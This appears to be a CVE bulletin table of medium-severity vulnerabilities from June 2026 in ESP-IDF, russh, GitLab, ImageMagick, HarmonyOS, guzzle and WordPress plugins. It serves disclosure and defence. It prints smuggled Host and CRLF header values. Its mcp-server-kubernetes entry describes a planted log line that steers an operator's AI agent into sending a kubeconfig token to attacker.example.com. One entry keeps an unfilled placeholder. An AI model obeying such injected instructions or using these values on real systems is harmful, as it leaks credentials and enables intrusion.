| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.2.7, 5.3.5, 5.4.4, 5.5.4, and 6.0.1, an out-of-bounds read flaw exists in the DHCP server option parser (parse_options() in components/lwip/apps/dhcpserver/dhcpserver.c) shipped with ESP-IDF's lwIP component. The parser walks the BOOTP/DHCP options field without validating that each option's length byte and declared payload length stay within the received packet buffer. A crafted DHCP request can cause the parser to read past the end of the options buffer into adjacent heap memory. The issue affects the DHCP server used by ESP-IDF's SoftAP and any configuration where the device runs as a DHCP server on a local network. This issue has been patched in versions 5.2.8, 5.3.6, 5.4.5, 5.5.5, and 6.0.2. | 2026-06-10 | 6.5 | CVE-2026-45160 |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.2.6, 5.3.5, 5.4.4, 5.5.3, and 6.0, an out-of-bounds read exists in the BlueDroid AVRCP vendor-command parser (avrc_pars_vendor_cmd() in components/bt/host/bluedroid/stack/avrc/avrc_pars_tg.c). This issue has been patched in versions 5.2.7, 5.3.6, 5.4.5, 5.5.4, and 6.0.1. | 2026-06-10 | 4.6 | CVE-2026-46532 |
| Essential Plugin--WP Logo Showcase Responsive Slider and Carousel | Authorization bypass through User-Controlled key vulnerability in Essential Plugin WP Logo Showcase Responsive Slider and Carousel allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Logo Showcase Responsive Slider and Carousel: from n/a through 3.6. | 2026-06-11 | 5.3 | CVE-2023-40200 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.37.0 to before version 0.61.0, in the russh client keyboard-interactive authentication path, a malicious SSH server could send a USERAUTH_INFO_REQUEST with an attacker-controlled prompt count, and the client would use that raw count directly in Vec::with_capacity(...) before validating that enough prompt data was actually present in the packet. This issue has been patched in version 0.61.0. | 2026-06-10 | 6.5 | CVE-2026-48107 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.34.0-beta.1 to before version 0.61.0, the russh server authentication path keeps internal userauth state across SSH_MSG_USERAUTH_REQUEST messages without separating that state when the request principal changes. RFC 4252 allows the user name and service name fields to change between authentication requests. The issue is not that such changes are invalid. The issue is that russh-owned authentication state, such as remaining methods, partial-success state, and in-progress method state, can remain associated with the connection and then influence a later request for a different (user, service). This is an internal library state mismatch. This issue has been patched in version 0.61.0. | 2026-06-10 | 5.3 | CVE-2026-46705 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.34.0-beta.1 to before version 0.61.0, russh did not enforce the SSH identification-string rules as deliberately as OpenSSH. In particular, the server-side identification reader used the same permissive path as the client, allowing pre-banner lines from clients, and the reader did not enforce a bounded number of pre-banner lines. For a library server built on russh, this could allow a remote peer to hold connection setup resources in the cleartext pre-authentication phase with malformed identification input that should have been rejected early. This issue has been patched in version 0.61.0. | 2026-06-10 | 5.3 | CVE-2026-48108 |
| Evoluted--PHP Directory Listing Script | Evoluted PHP Directory Listing Script through 4.0.5 contains a reflected cross-site scripting vulnerability in index.php where the dir parameter value is reflected without HTML encoding inside the HTML title element and inside anchor href attributes in the breadcrumb navigation. Attackers can inject arbitrary JavaScript via crafted dir parameter values by breaking out of the title context or injecting event handlers into breadcrumb anchor attributes to execute malicious scripts in a victim's browser. | 2026-06-09 | 5.4 | CVE-2026-25557 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, Fission builder pods were created with ServiceAccountName: fission-builder and no AutomountServiceAccountToken: false, so the kubelet auto-mounted the service-account token into every container in the pod - including the user-supplied builder image. This issue has been patched in version 1.24.0. | 2026-06-10 | 4.9 | CVE-2026-50565 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.25.0, HTTPTriggerSpec.Validate() validated Methods, FunctionReference, Host, IngressConfig, and CorsConfig, but silently skipped RelativeURL and Prefix. Those two fields were validated at the CLI level only (pkg/fission-cli/cmd/httptrigger/create.go:83). The post-CRD-modernization webhook for HTTPTrigger was retired in favor of API-server CEL - and CEL had no rules on those fields either - so an HTTPTrigger created via kubectl apply or a direct Kubernetes REST API call bypassed every URL-level check. This issue has been patched in version 1.25.0. | 2026-06-10 | 4.3 | CVE-2026-50569 |
| Flux159--mcp-server-kubernetes | mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account. This issue has been patched in version 3.7.0. | 2026-06-11 | 6.1 | CVE-2026-47250 |
| fooplugins--Photo Gallery by FooGallery : Responsive Image Gallery, Masonry Gallery & Carousel | The FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'custom_attribute_key' shortcode parameter in versions up to, and including, 3.1.31 This is due to an incomplete JavaScript event handler blacklist in the foogallery_sanitize_javascript() function, which blocks only a subset of HTML event attributes (onmouseover, onmouseout, onpointerenter, onclick, onload, onchange, onerror) while permitting others such as 'onmouseenter', combined with the failure to escape the attribute key when building the gallery container HTML in foogallery_build_container_attributes_safe(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-13 | 6.4 | CVE-2026-9134 |
| Fortinet--FortiOS | An Internal Asset Exposed to Unsafe Debug Access Level or State vulnerability [CWE-1244] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.2, FortiOS 7.4.0 through 7.4.7, FortiOS 7.2.0 through 7.2.10, FortiOS 7.0.0 through 7.0.16, FortiOS 6.4 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0 all versions may allow an authenticated admin to execute lua scripts via crafted CLI commands. | 2026-06-09 | 6 | CVE-2025-67862 |
| Fortinet--FortiPortal | A improper access control vulnerability in Fortinet FortiPortal 7.4.0 through 7.4.7, FortiPortal 7.2.0 through 7.2.8, FortiPortal 7.0 all versions may allow attacker to improper access control via <insert attack vector here> | 2026-06-09 | 6.2 | CVE-2026-49938 |
| frankverbeke--OpenClinic GA | OpenClinic GA 5.351.19 contains a reflected cross-site scripting vulnerability in the DICOM image upload handler that allows attackers to execute arbitrary JavaScript in a victim's browser by embedding malicious payloads in DICOM file metadata fields. Attackers can craft a DICOM file with JavaScript payloads in metadata fields such as Study Description, which are reflected without sanitization in popup.jsp and archiving/uploadfiles_jsp.java when processed through the Upload DICOM images feature. | 2026-06-09 | 6.1 | CVE-2026-25860 |
| Gen Digital--Avast Antivirus | Uncontrolled recursion vulnerability in Avast Antivirus when scanning a malformed Windows PE file may allow Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25031700. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 5.5 | CVE-2025-7005 |
| Gen Digital--Avast Antivirus | Use of stack memory after free vulnerability in Avast Antivirus when scanning a malformed Windows PE file may allow Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25022500. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 5.5 | CVE-2025-7006 |
| Gen Digital--Avast Antivirus | Stack overflow vulnerability due to uncontrolled recursion in Avast Antivirus when scanning a malformed PDF file may allow Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25021208. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 5.5 | CVE-2025-7010 |
| Gen Digital--Avast Antivirus | Stack overflow vulnerability in Avast Antivirus when scanning a malformed Office Open XML file may allow Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25020100. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 5.5 | CVE-2025-7019 |
| Gen Digital--Avira Antivirus | Null pointer dereference vulnerability in Avira Antivirus engine when scanning a malformed Windows PE file may allow Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.64. | 2026-06-12 | 5.5 | CVE-2025-7018 |
| Genspark--AI Workspace App | A vulnerability has been found in Genspark AI Workspace App 2.8.4 on Android. This vulnerability affects unknown code of the component ai.mainfunc.genspark. The manipulation leads to improper authorization in handler for custom url scheme. The attack can only be performed from a local environment. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 5.3 | CVE-2026-12190 |
| Ghidra--Ghidra | Ghidra before 12.1.1 contains an uncontrolled memory allocation vulnerability in the Mach-O binary parser that allows attackers to cause denial of service. An attacker can supply a crafted Mach-O binary with an arbitrarily large ncmds load command count value, forcing the parser to allocate excessive heap memory without validating file size, crashing the Ghidra JVM. | 2026-06-10 | 5.5 | CVE-2026-52759 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.10 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user to cause denial of service due to uncontrolled resource consumption when processing a specially crafted file upload. | 2026-06-11 | 6.5 | CVE-2026-1500 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.10 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to modify hidden merge requests due to incorrect authorization enforcements. | 2026-06-11 | 5.4 | CVE-2026-6269 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.10 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user to read arbitrary files from the Gitaly server and access internal network resources during repository import, due to insufficient validation of secondary URLs. | 2026-06-11 | 5.3 | CVE-2026-9204 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.0 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that could have allowed an authenticated user to cause denial of service on the CI/CD Catalog page due to improper sanitization. | 2026-06-11 | 4.3 | CVE-2026-10733 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 13.9 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with Security Manager-role permissions to manage project security configuration even when the relevant feature was in a disabled state, due to incorrect authorization enforcement. | 2026-06-11 | 4.3 | CVE-2026-6277 |
| GL.iNet--A1300 | A flaw has been found in GL.iNet A1300, AX1800, AXT1800, MT2500, MT3000, MT6000, X3000 and XE3000 4.8.x. This affects an unknown function of the component glnassys. Executing a manipulation can lead to use of hard-coded cryptographic key . The attack may be launched remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. Upgrading to version 4.9.0 mitigates this issue. Upgrading the affected component is advised. | 2026-06-08 | 5 | CVE-2026-11505 |
| Grit42--Grit | A vulnerability was detected in Grit42 Grit up to 0.11.0. Affected by this issue is some unknown functionality of the file modules/core/backend/app/controllers/concerns/grit/core/grit_entity_controller.rb of the component GritEntityController. Performing a manipulation results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 6.3 | CVE-2026-12188 |
| guzzle--guzzle-services | Guzzle Services provides an implementation of the Guzzle Command library that uses Guzzle service descriptions to describe web services, serialize requests, and parse responses into easy to use model structures. Versions prior ro 1.5.4 do not safely serialize scalar XML element values containing the CDATA terminator `]]>`. The XML request serializer writes values containing `<`, `>`, or `&` with `XMLWriter::writeCData($value)`. If attacker-controlled input contains `]]>`, the CDATA section closes early and the remainder is interpreted as XML markup. This is an outgoing request-body integrity issue, not a response parsing issue. The attacker does not need to control the service description or schema. Users are affected when all of the following are true: the application uses `guzzlehttp/guzzle-services` to serialize outgoing requests; a request parameter or `additionalParameters` schema uses `location: xml`; the value is serialized as XML element text, not an XML attribute; the value can contain attacker-controlled, user-controlled, tenant-controlled, or otherwise untrusted input; the value is not constrained by a safe `enum`, `pattern`, or custom filter that excludes `]]>`; and the downstream service parses the generated XML structurally and may act on unexpected, duplicated, or injected elements. Applications that serialize untrusted input into `location: xml` request parameters can emit XML containing attacker-controlled elements outside the intended text node. Depending on the receiving service, this can alter operation semantics, smuggle privileged fields, bypass modeled parameter boundaries, or create conflicting duplicated elements. Fixed service descriptions are sufficient if they contain an XML element parameter populated from attacker-controlled input. Users are not directly affected if they only use Guzzle Services to deserialize HTTP response bodies. Response XML parsing uses the response XML location visitor and does not invoke the vulnerable request XML serializer. Response bodies matter only in a second-order flow, such as parsing attacker-controlled response XML, storing or forwarding a parsed string value, and later using it as a `location: xml` request parameter. The issue is patched in `1.5.3` and later by safely splitting embedded CDATA terminators before serialization. The fix preserves the original scalar value as XML text and prevents injected nodes. As a workaround, constrain attacker-controlled XML element values with a strict `enum`, `pattern`, or custom filter that excludes `]]>`, or avoid serializing untrusted data into `location: xml` element text until patched. Where appropriate for the service schema, XML attributes are not affected because they are written with XMLWriter attribute APIs rather than CDATA sections. To determine whether action is needed, search service descriptions for request parameters using `location: xml`, including operation `parameters` and `additionalParameters`. Response-only `models` are not directly affected unless parsed values are reused for request serialization. For object and array parameters, review nested scalar properties because leaf element values can still be affected. | 2026-06-11 | 5.8 | CVE-2026-53723 |
| guzzle--psr7 | guzzlehttp/psr7 is a PSR-7 HTTP message library implementation in PHP. Versions prior to 2.10.2 contain improper Host header validation when parsing raw HTTP request messages and when deriving a server request URI from server variables. An attacker can provide a malformed Host header containing URI authority delimiters, such as `trusted.example@evil.example`. When the Host value is used to construct a URI, the malformed value can be reinterpreted as URI userinfo and host. This can cause the PSR-7 request URI host to differ from the original Host header value. Applications are affected if they parse attacker-controlled raw HTTP requests with `GuzzleHttp\Psr7\Message::parseRequest()` or the legacy 1.x `GuzzleHttp\Psr7\parse_request()` function, or if they build server requests from attacker-controlled server variables, then rely on the resulting URI host for routing, allow-list checks, or forwarding decisions. In affected forwarding or gateway scenarios, this may cause requests or credentials to be sent to an unintended host. The issue is patched in `2.10.2`. `1.x` is end-of-life and will not receive a patch. Some workarounds are available. Validate the `Host` header as `uri-host [ ":" port ]` before calling `Message::parseRequest()` or legacy `parse_request()` on untrusted HTTP request data, or before deriving routing and forwarding decisions from a parsed request URI. Reject Host values containing userinfo, path, query, or fragment delimiters. | 2026-06-11 | 5.3 | CVE-2026-48998 |
| guzzle--psr7 | guzzlehttp/psr7 is a PSR-7 HTTP message library implementation in PHP. Versions prior to 2.10.2 did not reject ASCII control characters, whitespace, or DEL in first-party URI host components. A vulnerable flow is: First, an application accepts a user-controlled URL. Second, the URL is used to construct a PSR-7 `Uri` or `Request`. Third, the host component contains CRLF or another header-unsafe character. Fourth, the host is copied into the PSR-7 `Host` header when no explicit `Host` header is provided. Finally, the request is serialized or sent by an HTTP client that does not independently reject the malformed host. In that flow, an attacker can cause the serialized request to contain additional attacker-controlled header lines. For example, a host containing `"\r\nX-Injected: yes"` can cause the generated `Host` header to span multiple HTTP header lines. Applications are affected when they use user-controlled URLs for outbound HTTP requests, URL forwarding, proxying, crawling, webhook delivery, or similar request-dispatch flows. In deployments involving HTTP/1.1 connection reuse, proxies, gateways, or load balancers, this malformed request may also contribute to request smuggling or cache poisoning, depending on how downstream components parse the request. The issue is patched in `2.10.2` and later. `1.x` is end-of-life and will not receive a patch. As a workaround, validate and reject all untrusted URI strings before constructing PSR-7 `Uri` or `Request` instances. Reject input containing ASCII control characters, whitespace, or DEL, including CRLF, tab, space, NUL, or DEL characters. Applications that forward requests should also ensure the final HTTP client or serializer rejects invalid URI and header data before writing requests to the network. | 2026-06-11 | 5.3 | CVE-2026-49214 |
| halfgaar--FlashMQ | FlashMQ is a MQTT broker/server, designed for multi-CPU environments. Prior to version 1.26.2, authorized clients have the ability to exceed the permitted over-commit of their write buffer and triggering an internal safe-guard exception. This exception was in a path that was not catchable, and therefore causes a server abort. This issue has been patched in version 1.26.2. | 2026-06-09 | 6.5 | CVE-2026-46411 |
| HashThemes--Hash Elements | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in HashThemes Hash Elements allows Retrieve Embedded Sensitive Data. This issue affects Hash Elements: from n/a through 1.5.4. | 2026-06-12 | 4.3 | CVE-2026-24618 |
| Hedef Media Promotion Interactive Media Marketing Inc.--Related Marketing Cloud (RMC) | Authentication bypass by spoofing vulnerability in Hedef Media Promotion Interactive Media Marketing Inc. Related Marketing Cloud (RMC) allows Brute Force. This issue affects Related Marketing Cloud (RMC): through 12052026. | 2026-06-12 | 6.5 | CVE-2026-5792 |
| helpfulcrowd--Helpfulcrowd Product Reviews | The Helpfulcrowd Product Reviews plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in versions up to, and including, 1.2.9. This is due to the `helpfulcrowd_validate_token()` function using a loose comparison operator (`!=`) instead of a strict comparison (`!==`) when validating the `token` parameter, while the corresponding REST route `/wp-json/helpfulcrowd/v1/update-settings` is registered with a `permission_callback` of `__return_true`, making it reachable by unauthenticated users; submitting a JSON boolean `true` as the `token` value causes PHP's loose comparison to evaluate as equal to the non-empty base64-encoded secret string, bypassing the check entirely. This makes it possible for unauthenticated attackers to invoke `helpfulcrowd_settings_endpoint()` and write arbitrary attacker-controlled key-value pairs directly into the `helpfulcrowd_options` WordPress database option via `update_option()` without any sanitization or allowlist filtering, enabling full unauthenticated modification of the plugin's stored configuration. | 2026-06-09 | 5.3 | CVE-2026-8499 |
| helpstring--Global Body Mass Index Calculator | The Global Body Mass Index Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gbmicalc' shortcode in versions up to, and including, 1.2. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes in the GBMI_Calc_Widget::widget() function. Shortcode attributes are extracted directly into local variables via @extract($args) and then echoed unescaped into an HTML style attribute (height/width) and HTML body context (title), allowing attribute-breakout payloads. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8883 |
| Hepta Platforms--Heptabase | Heptabase developed by Hepta Platforms has a Exposed Dangerous Method or Function vulnerability, allowing unauthenticated remote attackers to leverage social engineering techniques to trick a victim into opening or loading a malicious webpage within the Heptabase application, thereby gaining unauthorized access to camera and microphone permissions. | 2026-06-12 | 6.5 | CVE-2026-12060 |
| hs-web--hsweb-framework | A vulnerability has been found in hs-web hsweb-framework up to 5.0.1. The affected element is the function denied of the file hsweb-system/hsweb-system-file/src/main/java/org/hswebframework/web/file/FileUploadProperties.java of the component File Upload. The manipulation of the argument filename leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 8009845b577d8a2c4bbf4fdd8e8913799a714be6. It is suggested to install a patch to address this issue. | 2026-06-08 | 6.3 | CVE-2026-11470 |
| hs-web--hsweb-framework | A vulnerability was detected in hs-web hsweb-framework up to 5.0.1. This affects the function OAuth2Client of the file hsweb-authorization/hsweb-authorization-oauth2/src/main/java/org/hswebframework/web/oauth2/server/OAuth2Client.java of the component OAuth2 Client. The manipulation results in open redirect. The attack can be executed remotely. The exploit is now public and may be used. The patch is identified as c2882679a9125cea52678151af5ae213cbd52579. Applying a patch is advised to resolve this issue. | 2026-06-08 | 4.3 | CVE-2026-11477 |
| Huawei--HarmonyOS | Permission management vulnerability in the network management module. Impact: Successful exploitation of this vulnerability may affect service integrity. | 2026-06-09 | 6.3 | CVE-2026-41975 |
| Huawei--HarmonyOS | Permission control vulnerability in the audio framework. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-06-09 | 6.6 | CVE-2026-41976 |
| Huawei--HarmonyOS | Race condition vulnerability in the IPC module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 6.4 | CVE-2026-41982 |
| Huawei--HarmonyOS | Path traversal vulnerability in the SMS app. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 5.4 | CVE-2026-41972 |
| Huawei--HarmonyOS | Permission control vulnerability in calls. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 5.9 | CVE-2026-41973 |
| Huawei--HarmonyOS | DoS vulnerability in the log service. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 5 | CVE-2026-41977 |
| Huawei--HarmonyOS | Permission control vulnerability in the print module. Impact: Successful exploitation of this vulnerability may affect integrity and confidentiality. | 2026-06-09 | 5.5 | CVE-2026-41979 |
| Huawei--HarmonyOS | Permission control vulnerability in the file preview module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-06-09 | 5.5 | CVE-2026-41980 |
| Huawei--HarmonyOS | Out-of-bounds write vulnerability in the IPC module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 5.3 | CVE-2026-41981 |
| Huawei--HarmonyOS | UAF vulnerability in the package management module. Impact: Successful exploitation of this vulnerability may affect service integrity. | 2026-06-09 | 5.2 | CVE-2026-41984 |
| Huawei--HarmonyOS | UAF vulnerability in the package management module. Impact: Successful exploitation of this vulnerability may affect service integrity. | 2026-06-09 | 5.1 | CVE-2026-41985 |
| Huawei--HarmonyOS | Permission control vulnerability in the clone module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-06-09 | 4.4 | CVE-2026-41978 |
| Huawei--HarmonyOS | DoS vulnerability in the browser kernel. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-06-09 | 4.3 | CVE-2026-41983 |
| hyperledger--fabric-chaincode-java | fabric-chaincode-java is a Java based implementation of Hyperledger Fabric chaincode shim APIs. From version 2.3.1 to before version 2.5.10, when chaincode is deployed in chaincode-as-a-service mode with TLS enabled, the chaincode server INFO level logging includes the TLS private key password in plaintext. An attacker with access to the chaincode server logs could recover the TLS private key password. If the attacker can also obtain the TLS private key, they could impersonate the chaincode server. This issue has been patched in version 2.5.10. | 2026-06-08 | 5.5 | CVE-2026-45581 |
| IBM--DevOps Plan | IBM DevOps Plan 3.0.0 through 3.0.6 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking | 2026-06-11 | 6.5 | CVE-2026-4096 |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.0.0 through 1.9.2 IBM Langflow is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2026-06-11 | 5.4 | CVE-2026-3341 |
| IBM--Security QRadar EDR | IBM Security QRadar EDR 3.12 through 3.12.24 stores user credentials in plain text which can be read by a local privileged user. | 2026-06-11 | 4.1 | CVE-2024-45636 |
| IEI Integration Corp--iRM-TSi410X | The iRM-IEI Remote Management developed by IEI Integration Corp has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain partial system configuration information. | 2026-06-12 | 5.3 | CVE-2026-11848 |
| IEI Integration Corp--iVEC TANK-XM811 | The iVEC-IEI Virtualization Edge Computer developed by IEI Integration Corp has a Arbitrary File Read vulnerability, allowing privileged remote attackers to access files outside the intended directory scope. | 2026-06-12 | 4.9 | CVE-2026-11844 |
| IEI Integration Corp--iVEC TANK-XM811 | The iVEC-IEI Virtualization Edge Computer developed by IEI Integration Corp has a Path Traversal vulnerability, allowing authenticated remote attackers to exploit this vulnerability to create directories in unintended system paths. | 2026-06-12 | 4.3 | CVE-2026-11847 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2.23 and 6.9.13-48, a crafted MSL image can trigger a heap-use-after-free. Versions 7.1.2.23 and 6.9.13-48 fix the issue. | 2026-06-10 | 6.2 | CVE-2026-46523 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-23, due to a missing depth check a stack overflow can occur in the fx operation by passing a crafted argument. This issue has been patched in version 7.1.2-23. | 2026-06-10 | 6.2 | CVE-2026-46557 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-25, a crafted multi-frame can result in a heap buffer over-write when encoding it with the SF3 encoder. This issue has been patched in version 7.1.2-25. | 2026-06-10 | 6.2 | CVE-2026-53465 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, when writing an IPTC output file a malicious input file could cause an out of bounds read of a single byte. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.1 | CVE-2026-42326 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, due to a missing check in the PSD decoder it would be possible to bypass the list-length resource policy when decoding a PSD image. Other security limits would still apply. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.3 | CVE-2026-45031 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, an off by one in the meta encoder could result in an out of bounds read of a single byte in the meta encoder. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.3 | CVE-2026-45358 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-22, an invalid connected-components:keep-top value could result in a heap buffer over-read when performing the connected components operation. This issue has been patched in versions 6.9.13-48 and 7.1.2-22. | 2026-06-10 | 5.7 | CVE-2026-45359 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, when performing a polynomial distortion an out of bounds over-read of 24 bytes can occur when specifying specific arguments. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.1 | CVE-2026-45624 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-47 and 7.1.2-22, because of a missing check in the MNG coder it would be possible to read more images than the list limit policy would allow resulting in excessive resource use. This issue has been patched in versions 6.9.13-47 and 7.1.2-22. | 2026-06-10 | 5.3 | CVE-2026-45664 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, when using LZMA compression in the MIFF encoder an out of bounds write can occur due to a missing check. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 5.5 | CVE-2026-46521 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, an attacker who can connect to a magick -distribute-cache service can cause a heap buffer over-read in the server process. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 5.7 | CVE-2026-47166 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-24, when using an image with mask the Floyd-Steinberg dithering method it will cause a negative heap buffer over-write. This issue has been patched in version 7.1.2-24. | 2026-06-10 | 5.5 | CVE-2026-48724 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-49 and 7.1.2-24, a crafted MVG file could result in a stack overflow due to a missing depth or visited-set check. This issue has been patched in versions 6.9.13-49 and 7.1.2-24. | 2026-06-10 | 5.5 | CVE-2026-48734 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-24, a missing check of a return value could lead to a heap buffer over-write in the MAT decoder on 32-bit systems. This issue has been patched in versions 6.9.13-48 and 7.1.2-24. | 2026-06-10 | 5.9 | CVE-2026-48994 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-24, an incorrect parsing of the filename can result in a policy bypass and read files disallowed by a security policy using a symlink. This issue has been patched in versions 6.9.13-48 and 7.1.2-24. | 2026-06-10 | 5.5 | CVE-2026-49219 |
